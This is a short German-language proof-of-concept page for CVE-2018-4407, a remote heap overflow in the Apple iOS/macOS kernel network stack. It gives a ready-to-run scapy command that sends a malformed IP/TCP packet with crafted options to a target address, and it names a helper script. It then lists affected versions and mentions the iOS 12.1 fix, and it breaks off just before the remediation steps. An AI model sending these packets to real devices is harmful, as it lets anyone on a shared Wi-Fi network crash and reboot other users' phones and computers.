
iOS 12 / OS X Remote-Kernel-Heap-Overflow (CVE-2018-4407) PoC
*iOS 12 / OS X Remote Kernel Heap Overflow (CVE-2018-4407) POC:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
Oder verwenden Sie das Skript
python check_icmp_dos.py 127.0.0.1
Diese Schwachstelle ermöglicht es einem Angreifer, der sich lediglich im selben Wi-Fi-Netzwerk befinden muss, bösartige Datenpakete an andere ahnungslose Benutzer zu senden und dadurch den Absturz und Neustart beliebiger Mac- oder iOS-Geräte auszulösen. Da die Schwachstelle im Netzwerkkern des Systems liegt, kann keine Antivirensoftware sie abwehren.
Geräte mit den folgenden Betriebssystemen sind verwundbar:
Apple iOS 11 und frühere Versionen: Alle Geräte (einige Geräte, die auf iOS 12 aktualisiert wurden)
Apple macOS High Sierra (höchste betroffene Version 10.13.6): Alle Geräte (behoben durch Sicherheitsupdate 2018-001)
Apple macOS Sierra (höchste betroffene Version 10.12.6): Alle Geräte (behoben durch Sicherheitsupdate 2018-005)
Apple OS X El Capitan und frühere Versionen: Alle Geräte
Apple hat inzwischen das iOS-12.1-Update veröffentlicht, das diese Schwachstelle behebt. Benutzer sollten umgehend ihre Systemversion überprüfen und bei Betroffenheit entsprechende Maßnahmen ergreifen. Die Maßnahmen zur Behebung der Schwachstelle sind wie folgt: